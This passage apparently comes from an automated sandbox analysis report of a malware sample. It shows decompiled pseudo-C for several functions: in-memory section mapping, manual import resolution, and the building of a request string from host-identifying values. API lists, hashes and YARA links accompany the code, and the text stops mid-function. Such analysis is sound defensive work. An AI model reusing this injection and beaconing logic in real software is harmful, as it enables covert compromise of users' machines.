Opcode Fuzzy Hash: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction Fuzzy Hash: 2D3228B2E00619CFDB08CFA8D588AADBBB3FB69704F10811ED505A7285D7746A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA260, Relevance: 5.7, APIs: 1, Strings: 1, Instructions: 2181COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000550,?,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000022,00000000,6E202008,6E20200C), ref: 6E1CBB39

Strings

^, xrefs: 6E1CBA5F

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: PathTemp
String ID: ^
API String ID: 2920410445-1590793086
Opcode ID: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction ID: 6e746a0985220d5da548d07382223b66a8a09577f7db703cf7d906aef81ff1ee
Opcode Fuzzy Hash: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction Fuzzy Hash: 31233BF2A00B20CFEB18CF68C598A6577B3B7AA704B05C21FD509972C6D6B45A84DF71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1A1996(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E1A1A44(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e1a199f
0x6e1a19a6
0x6e1a19a7
0x6e1a19a8
0x6e1a19a9
0x6e1a19aa
0x6e1a19bb
0x6e1a19bf
0x6e1a19d3
0x6e1a19d6
0x6e1a19d9
0x6e1a19e0
0x6e1a19e3
0x6e1a19ea
0x6e1a19ed
0x6e1a19f0
0x6e1a19f3
0x6e1a19f8
0x6e1a1a33
0x6e1a19fa
0x6e1a19fd
0x6e1a1a03
0x6e1a1a08
0x6e1a1a0c
0x6e1a1a2a
0x6e1a1a0e
0x6e1a1a15
0x6e1a1a23
0x6e1a1a23
0x6e1a1a0c
0x6e1a1a3b

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1A19F3

Part of subcall function 6E1A1A44: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1A1A08,00000002,00000000,?,?,00000000,?,?,6E1A1A08,00000002), ref: 6E1A1A71

memset.NTDLL ref: 6E1A1A15

Strings

@, xrefs: 6E1A19E3

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction ID: 844d90f13077d23a8d49593d29ba8a7506aa67a38d4f805bf0b9c9a66ab12812
Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction Fuzzy Hash: BE211DB5E00209AFDB01DFEDC8849EEFBB9EF48354F104429E615F7210D7309A489B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1BAC, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1BAC(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e1a4140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e1a1bac
0x6e1a1bb5
0x6e1a1bba
0x6e1a1bc0
0x6e1a1bc9
0x6e1a1bcf
0x6e1a1bd1
0x6e1a1bd4
0x6e1a1bd9
0x6e1a1be0
0x6e1a1be0
0x6e1a1be4
0x6e1a1bea
0x6e1a1bef
0x00000000
0x00000000
0x6e1a1bf5
0x6e1a1bff
0x6e1a1c01
0x6e1a1c04
0x6e1a1c07
0x6e1a1c0b
0x6e1a1c13
0x6e1a1c15
0x6e1a1c18
0x6e1a1c80
0x6e1a1c80
0x6e1a1c84
0x00000000
0x00000000
0x6e1a1c1d
0x6e1a1c23
0x6e1a1c25
0x6e1a1c38
0x6e1a1c3b
0x6e1a1c3b
0x6e1a1c3b
0x6e1a1c3f
0x6e1a1c27
0x6e1a1c27
0x6e1a1c2f
0x6e1a1c31
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a1c31
0x6e1a1c1f
0x6e1a1c1f
0x6e1a1c33
0x6e1a1c33
0x6e1a1c33
0x6e1a1c42
0x6e1a1c45
0x6e1a1c47
0x6e1a1c4e
0x6e1a1c49
0x6e1a1c49
0x6e1a1c49
0x6e1a1c56
0x6e1a1c5c
0x6e1a1c5e
0x6e1a1c8e
0x6e1a1c60
0x6e1a1c60
0x6e1a1c63
0x6e1a1c65
0x6e1a1c6d
0x6e1a1c6d
0x6e1a1c72
0x6e1a1c74
0x6e1a1c7b
0x6e1a1c7d
0x6e1a1c7d
0x6e1a1c7d
0x00000000
0x6e1a1c7d
0x00000000
0x6e1a1c5e
0x6e1a1c0d
0x6e1a1c0d
0x6e1a1c11
0x00000000
0x00000000
0x6e1a1c11
0x6e1a1c91
0x6e1a1c91
0x6e1a1c98
0x6e1a1c9d
0x00000000
0x00000000
0x6e1a1ca3
0x6e1a1cae
0x00000000
0x6e1a1cae
0x6e1a1ca5
0x6e1a1ca5
0x6e1a1cab
0x00000000
0x6e1a1cab
0x6e1a1bd9
0x6e1a1caf
0x6e1a1cb4

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1A1BE4
GetProcAddress.KERNEL32(?,00000000), ref: 6E1A1C56

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 2f32a775949509cee2f91f517e43715b1d9620526252b58858156d990b31380b
Instruction ID: 98461e30e16375cd7d23a4f23cd4ee3e9d901dd90a9ae78bdea4e0325cd53d99
Opcode Fuzzy Hash: 2f32a775949509cee2f91f517e43715b1d9620526252b58858156d990b31380b
Instruction Fuzzy Hash: 8C316DB9B002269FDB04CF9DC890ABEB7F5BF15310FA04069D951EB248E730DA85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1A44, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E1A1A44(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e1a1a56
0x6e1a1a5c
0x6e1a1a6a
0x6e1a1a71
0x6e1a1a76
0x6e1a1a7c
0x00000000
0x6e1a1a7d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1A1A08,00000002,00000000,?,?,00000000,?,?,6E1A1A08,00000002), ref: 6E1A1A71

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: c588812a71b5a35e254e8214979adb430d01379af845499d17d1dd92a4e17589
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: B1F019B560020DBFD7119F99CC85C9FBBBDDB44394B104939F552D1050D6309E489B60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA4AB6, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02EA4AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2ead018; // 0xc25f505c
				asm("bswap eax");
				_t61 =  *0x2ead014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2ead010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2ead00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x2ead2a8; // 0xb1a5a8
				_t3 = _t64 + 0x2eae633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60, E02EAD02C,  *0x2ead004, _t59);
				_t67 = E02EA56CD();
				_t68 =  *0x2ead2a8; // 0xb1a5a8
				_t4 = _t68 + 0x2eae673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E02EA58DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2ead2a8; // 0xb1a5a8
					_t7 = _t126 + 0x2eae8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2ead238, 0, _v8);
				}
				_t73 = E02EAA199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2ead2a8; // 0xb1a5a8
					_t11 = _t121 + 0x2eae8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2ead238, 0, _v8);
				}
				_t146 =  *0x2ead32c; // 0x39c95b0
				_t75 = E02EA4622( &E02EAD00A, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x2ead238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2ead238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2ead238, _t152, _v20);
						goto L26;
					}
					E02EA518F(GetTickCount());
					_t82 =  *0x2ead32c; // 0x39c95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2ead32c; // 0x39c95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2ead32c; // 0x39c95b0
					_t148 = E02EA1BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						RtlFreeHeap( *0x2ead238, _t152, _v8); // executed
						goto L25;
					}
					StrTrimA(_t148, 0x2eac28c);
					_push(_t148);
					_t94 = E02EA361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2ead238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02EA9070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02EA6761();
						L22:
						HeapFree( *0x2ead238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02EA69B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E02EA391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02EAA734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02EA5800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02EAA734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02ea4ab6
0x02ea4ab6
0x02ea4ab6
0x02ea4abf
0x02ea4ac8
0x02ea4aca
0x02ea4aca
0x02ea4ad7
0x02ea4ae2
0x02ea4ae5
0x02ea4aea
0x02ea4af3
0x02ea4af6
0x02ea4afb
0x02ea4afe
0x02ea4b03
0x02ea4b06
0x02ea4b12
0x02ea4b1f
0x02ea4b21
0x02ea4b27
0x02ea4b2c
0x02ea4b37
0x02ea4b39
0x02ea4b3c
0x02ea4b3e
0x02ea4b43
0x02ea4b49
0x02ea4b4e
0x02ea4b51
0x02ea4b56
0x02ea4b63
0x02ea4b65
0x02ea4b6b
0x02ea4b75
0x02ea4b75
0x02ea4b77
0x02ea4b7c
0x02ea4b81
0x02ea4b84
0x02ea4b89
0x02ea4b96
0x02ea4b98
0x02ea4ba6
0x02ea4ba6
0x02ea4ba8
0x02ea4bb6
0x02ea4bbb
0x02ea4bbd
0x02ea4bc2
0x02ea4d83
0x02ea4d8d
0x02ea4d96
0x02ea4bc8
0x02ea4bd4
0x02ea4bda
0x02ea4bdf
0x02ea4d77
0x02ea4d81
0x00000000
0x02ea4d81
0x02ea4beb
0x02ea4bf0
0x02ea4bf9
0x02ea4c0a
0x02ea4c0e
0x02ea4c17
0x02ea4c1d
0x02ea4c2c
0x02ea4c33
0x02ea4c3c
0x02ea4c42
0x02ea4d6b
0x02ea4d75
0x00000000
0x02ea4d75
0x02ea4c4e
0x02ea4c54
0x02ea4c55
0x02ea4c5a
0x02ea4c5f
0x02ea4d61
0x02ea4d69
0x00000000
0x02ea4d69
0x02ea4c68
0x02ea4c6f
0x02ea4c77
0x02ea4c7c
0x02ea4c85
0x02ea4c90
0x02ea4c95
0x02ea4c9a
0x02ea4d99
0x02ea4d4d
0x02ea4d4d
0x02ea4d52
0x02ea4d5d
0x02ea4d5f
0x00000000
0x02ea4d5f
0x02ea4ca4
0x02ea4ca9
0x02ea4cae
0x02ea4cb3
0x02ea4cbe
0x02ea4cc3
0x02ea4cc6
0x02ea4ccc
0x02ea4cd2
0x02ea4cd8
0x02ea4cdb
0x02ea4ce1
0x02ea4ce4
0x02ea4ce9
0x02ea4ced
0x02ea4ced
0x02ea4cf9
0x02ea4d05
0x02ea4d09
0x02ea4d0b
0x02ea4d10
0x02ea4d12
0x02ea4d17
0x02ea4d1c
0x02ea4d29
0x02ea4d31
0x02ea4d34
0x02ea4d34
0x02ea4d10
0x00000000
0x02ea4cfb
0x02ea4cff
0x02ea4d36
0x02ea4d39
0x02ea4d42
0x00000000
0x00000000
0x00000000
0x00000000
0x02ea4d42
0x02ea4d01
0x00000000
0x02ea4d01
0x02ea4cf9

APIs

GetTickCount.KERNEL32 ref: 02EA4ACA
wsprintfA.USER32 ref: 02EA4B1A
wsprintfA.USER32 ref: 02EA4B37
wsprintfA.USER32 ref: 02EA4B63
HeapFree.KERNEL32(00000000,?), ref: 02EA4B75
wsprintfA.USER32 ref: 02EA4B96
HeapFree.KERNEL32(00000000,?), ref: 02EA4BA6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02EA4BD4
GetTickCount.KERNEL32 ref: 02EA4BE5
RtlEnterCriticalSection.NTDLL(039C9570), ref: 02EA4BF9
RtlLeaveCriticalSection.NTDLL(039C9570), ref: 02EA4C17

Part of subcall function 02EA1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE1
Part of subcall function 02EA1BB6: lstrlen.KERNEL32(?,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE9
Part of subcall function 02EA1BB6: strcpy.NTDLL ref: 02EA1C00
Part of subcall function 02EA1BB6: lstrcat.KERNEL32(00000000,?), ref: 02EA1C0B
Part of subcall function 02EA1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02EA20C2,?,039C95B0), ref: 02EA1C28

StrTrimA.SHLWAPI(00000000,02EAC28C,?,039C95B0), ref: 02EA4C4E

Part of subcall function 02EA361A: lstrlen.KERNEL32(039C9A78,00000000,00000000,7742C740,02EA20ED,00000000), ref: 02EA362A
Part of subcall function 02EA361A: lstrlen.KERNEL32(?), ref: 02EA3632
Part of subcall function 02EA361A: lstrcpy.KERNEL32(00000000,039C9A78), ref: 02EA3646
Part of subcall function 02EA361A: lstrcat.KERNEL32(00000000,?), ref: 02EA3651

lstrcpy.KERNEL32(00000000,?), ref: 02EA4C6F
lstrcpy.KERNEL32(?,?), ref: 02EA4C77
lstrcat.KERNEL32(?,?), ref: 02EA4C85
lstrcat.KERNEL32(?,00000000), ref: 02EA4C8B

Part of subcall function 02EA9070: lstrlen.KERNEL32(?,00000000,039C9A98,00000000,02EA8808,039C9C76,?,?,?,?,?,63699BC3,00000005,02EAD00C), ref: 02EA9077
Part of subcall function 02EA9070: mbstowcs.NTDLL ref: 02EA90A0
Part of subcall function 02EA9070: memset.NTDLL ref: 02EA90B2

wcstombs.NTDLL ref: 02EA4D1C

Part of subcall function 02EA391F: SysAllocString.OLEAUT32(?), ref: 02EA395A
Part of subcall function 02EA391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02EA39DD

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

HeapFree.KERNEL32(00000000,?,?), ref: 02EA4D5D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02EA4D69
RtlFreeHeap.NTDLL(00000000,?,?,039C95B0), ref: 02EA4D75
HeapFree.KERNEL32(00000000,?), ref: 02EA4D81
RtlFreeHeap.NTDLL(00000000,?), ref: 02EA4D8D

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: daa336b4b75f6faa1632b5c7e2adf33bea366638b814e3cdb44a11a7c86a00cf
Instruction ID: fd488a2a1aace3d0558f8755fc22c3d2fb5d2a3e192b45ff048518b1d5145fbb
Opcode Fuzzy Hash: daa336b4b75f6faa1632b5c7e2adf33bea366638b814e3cdb44a11a7c86a00cf
Instruction Fuzzy Hash: 21918C71980208AFCB11DFA5DC98A9E7BBAEF48314F548864F408DB260C730F9A1DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02EAAC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02EAAC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2ea0000;
				_t115 = _t139[3] + 0x2ea0000;
				_t131 = _t139[4] + 0x2ea0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2ea0000;
				_v16 = _t139[5] + 0x2ea0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2ea0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2ead1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2ead1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2ead1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2ead19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2ead1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2ead198; // 0x0
										 *_t102 = _t125;
										 *0x2ead198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2ead19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
